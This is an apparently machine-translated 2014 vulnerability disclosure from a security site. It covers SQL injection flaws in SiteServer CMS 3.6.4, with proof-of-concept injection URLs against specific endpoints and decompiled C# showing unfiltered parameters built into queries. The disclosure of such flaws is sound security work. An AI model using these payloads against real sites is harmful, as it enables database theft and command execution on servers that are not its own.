siteserver latest version 3. 6. 4 sql inject-vulnerability warning-the black bar safety net

2014-01-07T00:00:00
ID MYHACK58:62201441724
Type myhack58
Reporter 佚名
Modified 2014-01-07T00:00:00

Description

1.

http://xxx.com/siteserver/service/background_taskLog.aspx?Keyword=test%' and @@version=1 and 2='1&DateFrom=&DateTo=&IsSuccess=All

The injection point is present in the Keyword, completely without any filtering. VariousSQL injectiontype, you can execute os cmd, off pants

  1. The second injection there siteserver/platform/background_log. aspx

用 .NET Reflector decompile BaiRong. BackgroundPages. dll this file

View Code is as follows:

this. spContents. ConnectionString = BaiRongDataProvider. ConnectionString;

flag = base. Request. QueryString["UserName"] != null;

if (! flag)

{

this. spContents. SelectCommand = BaiRongDataProvider. LogDAO. GetSelectCommend();

}

else

{

this. spContents. SelectCommand = BaiRongDataProvider. LogDAO. GetSelectCommend(base. Request. QueryString["UserName"], base. Request. QueryString["Keyword"], base. Request. QueryString["DateFrom"], base. Request. QueryString["DateTo"]);

}

All of the parameters are not effectively filtered

Vulnerability to prove:

http://www.target.com/siteserver/platform/background_log.aspx?UserName=test&Keyword=1&DateFrom=2 0 1 2 0 1 0 1'%20and%2 0@@version=1%20and%2 0 1='test&DateTo=test

  1. The third injection there usercenter/platform/user. aspx

用 .NET Reflector decompile UserCenter. Pages. dll this file

View Code is as follows:

if (! string. IsNullOrEmpty(base. Request. QueryString["Lock"]))

{

str = base. Request. QueryString["UserNameCollection"];

userNameArrayList = TranslateUtils. StringCollectionToArrayList(str);

UserDataProvider. UserDAO. Lock(userNameArrayList, true);

LogUtils. AddLog("user:" + UserDataProvider. UserDAO. CurrentUserName, "locking users", string. Format("user:{0}", str));

}

Lock is not empty, UserNameCollection it into UserDataProvider. UserDAO. Lock function

public void Lock(ArrayList userNameArrayList, bool isLockOut)

{

string commandText = string. Format("UPDATE bairong_Users SET IsLockedOut = '{0}' WHERE [UserName] IN ({1})", isLockOut. ToString(), TranslateUtils. ObjectCollectionToSqlInStringWithquote(userNameArrayList));

base. ExecuteNonQuery(commandText);

UserManager. Clear();

}

UserNameCollection not be effectively filtered

http://www.target.com/usercenter/platform/user.aspx?UnLock=sdfe'&UserNameCollection=test')%20and%2 0@@version=2;%2 0--

  1. The seventh injection the presence/UserCenter/cms/contents. aspx

用 .NET Reflector decompile UserCenter. Pages. dll this file

View Code is as follows:

int totalCount;

bool flag;

string keyword = this. Keyword. Text. Trim();

if((((uint) totalCount) - ((uint) flag)) <= uint. MaxValue)

{

string start = this. start. Value;

if (0 != 0)

{

return;

}

string end = this. end. Value;

if((((uint) flag) - ((uint) flag)) <= uint. MaxValue)

{

base. SetPublishmentSystemID(TranslateUtils. ToInt(this. ddlPublishmentSystemID. SelectedValue));

this. spContents. ControlToPaginate = this. dlContents;

this. dlContents. ItemDataBound += new RepeaterItemEventHandler(this. x140df91522580d1f);

this. spContents. ItemsPerPage = 3 0;

this. spContents. ConnectionString = BaiRongDataProvider. ConnectionString;

this. spContents. SelectCommand = DataProvider. ContentDAO. GetSelectCommendOfTouGao(base. PublishmentSystemInfo. AuxiliaryTableForContent, base. PublishmentSystemID, start, end, keyword, base. UserName, this. touGaoType);

}

this. spContents. SortField = "ID";

Attention keyword

[1] [2] next